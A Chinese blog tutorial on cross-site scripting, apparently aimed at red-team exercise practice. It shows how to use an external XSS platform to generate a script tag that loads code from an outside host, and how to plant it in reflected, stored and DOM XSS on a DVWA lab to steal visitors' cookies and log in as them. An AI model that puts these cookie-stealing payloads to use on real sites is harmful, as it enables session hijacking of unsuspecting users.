HW常见攻击方式 --XSS跨站脚本攻击 - Kirin博客

HW常见攻击方式 --XSS跨站脚本攻击

作者: Bee

全网最全的网络资源分享网站

标签:

xss

特别声明:部分文章为网络转载,资源使用一般不提供任何帮助,特殊资源除外,如有侵权请联系站长!请勿违法!本站文章仅供学习了解!技术无罪!

一、XSS介绍

跨站脚本攻击(CrossSiteScripting),为不和层叠样式表(CascadingStyleSheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。



二、XSS平台

1、注册登陆账号,没有百分之百的安全,仅供测试交流

https://xssaq.com/xss.php

2、新建项目

3、自动生成要插入的xss代码

<sCRiPt/SrC=https://xssaq.com/dGLM>


三、反射性xss

1、在存在xss漏洞的网站,插入上面生成的xss代码,点击submit

2、刷新xss平台,会发现有一条数据

3、知道了网址,也知道cookie,下面利用工具登录,不用输入账号密码,直接登录了dvwa平台

4、反射性xss是一次性的,也就是说,需要人去点击下面的链接,才能触发该漏洞

http://192.168.1.14/dvwa/vulnerabilities/xss_r/?name=%3CsCRiPt%2FSrC%3Dhttps%3A%2F%2Fxssaq.com%2FdGLM%3E#



四、存储型xss

1、在留言板输入上面生成xss代码

2、只要刷新一下该页面,xss平台就出现一条记录,也就是说只要有人看到该留言板,我们就能获取其cookie

3、利用工具登录

4、存储型xss漏洞,理论是永久的,只要有人浏览到你插入的代码,他的cookie信息就会被拿到。

五、DOM型XSS

1、点击select,发现url中有English,

2、修改url中english为aaa,发现插入了代码中,所以存在dom型xss注入


3、插入生成的xss代码,即可获取对方的cookie


六、工具下载:加入交流群

本文最后更新于2021-3-23,已超过 1 年没有更新,如果文章内容或图片资源失效,请留言反馈,我们会及时处理,谢谢!
分享到:
加入交流群
未经允许不得转载:

作者: Bee, 转载或复制请以 超链接形式 并注明出处 Kirin博客
原文地址: 《HW常见攻击方式 --XSS跨站脚本攻击》 发布于2021-3-23

切换注册

登录

您也可以使用第三方帐号快捷登录

切换登录

注册

觉得文章有用就加入交流群吧

QQ扫一扫